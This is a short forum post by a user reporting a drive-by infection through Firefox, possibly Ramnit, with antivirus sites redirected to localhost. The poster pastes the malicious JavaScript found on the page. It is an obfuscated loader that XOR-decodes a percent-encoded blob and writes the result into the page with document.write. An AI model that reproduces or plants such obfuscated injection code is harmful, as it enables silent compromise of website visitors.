Javascript Firefox Virus - Ramnit?

lookitsjonno

lookitsjonno

lookitsjonno

Soldato
Joined
10 Sep 2003
Posts
5,019
Location
Midlands
Yesterday firefox allowed a virus to be installed through some Javascript embedded on a page (below), dispite having Avira and Security Essentials installed. Security essentials after a full scan did however remove it, but with great inconvenience.

How on earth did this happen :confused:

Secondly, traffic to antivirus sites is being redirected to 127.0.0.1, but my HOSTS file is clean? anywhere else I can look?

Code: 
<script language='javascript'>var ewjiRNjmidvKoG='';WIMAZQPMxKxqknA='iHEcfS';var IqffjkAHo='jpwfEKWZbKHJzegTnSUTESWQujKdnRjXXQ';ylHHsiYQHIaPXHLWv='iyfGL';var upReKQvtmF=0;urNBMhiClQJSn='gkpWdT';var DsUUJQDkuAybtumCCfF='%4C%1E%66%37%2A%3A%3F%42%38%3A%29%47%47%0F%20%1A%23%6F%7B%6A%3D%32%23%58%0B%27%08%0B%20%44%37%2A%36%45%19%19%48%26%2C%3E%65%06%2E%2E%2B%0F%09%13%76%4E%35%27%35%28%36%35%3E%07%0E%2E%16%53%70%5A%7A%78%22%09%02%18%0A%29%22%39%3D%5F%69%26%25%58%45%0F%31%07%34%3D%20%78%71%66%73%55%1D%22%64%1A%3A%57%7A%69%73%4A%18%04%16%24%28%32%67%40%7A%6A%6A%0C%16%17%35%0D%36%68%76%74%71%77%3C%14%18%2C%0D%6E%25%03%3C%2C%39%57%52%47%44%65%26%36%28%05%22%26%22%1F%0C%67%3C%1A%6E%77%64%67%6D%6B%7E%1C%0C%39%05%03%37%54';tNZgZLbHExemhLK='GvZXxXwSSrDHywfWW';var YosCfDQXijJkMDP=DsUUJQDkuAybtumCCfF.length/3;IlZBYHGeUUNDJLapsbsm='SURgNCIJhZhmPmoyBDXNNx';DsUUJQDkuAybtumCCfF=unescape(DsUUJQDkuAybtumCCfF);UIvEdENLdScmkQKUjk='eKyjZLHyD';for(DeuIEsJXCIMaxHgXxVtwZs=0;DeuIEsJXCIMaxHgXxVtwZs<YosCfDQXijJkMDP;DeuIEsJXCIMaxHgXxVtwZs++){upReKQvtmF++;if(IqffjkAHo.length<=upReKQvtmF) upReKQvtmF=0;WszHMY=DsUUJQDkuAybtumCCfF.charCodeAt(DeuIEsJXCIMaxHgXxVtwZs); TrTgSjVLBgEHcZODeO='wcoYzlwCqQIWyrkzdORhfQC'; if(IqffjkAHo.charCodeAt(upReKQvtmF)!=WszHMY) WszHMY^=IqffjkAHo.charCodeAt(upReKQvtmF); goZMVdrRqfaRiXWfZEQdMeBo='SzEhKIQFgWMaqrCXm';ewjiRNjmidvKoG+=String.fromCharCode(WszHMY);} MJiRsETaWCMkbvgczphog='EtrwuSVKPLZg';document.write(ewjiRNjmidvKoG);nfKvvuWAHwGmawGVlLAHNHSOq='uqzMywr';</script>
 
I checked out the plugins and it seems the version of flash had vulnerabilities, nice of firefox to tell me that isn't it :rolleyes:

I can't think to imagine how the poor computer illiterate soles of the country get on.
 
You must log in or register to reply here.
Back
Top Bottom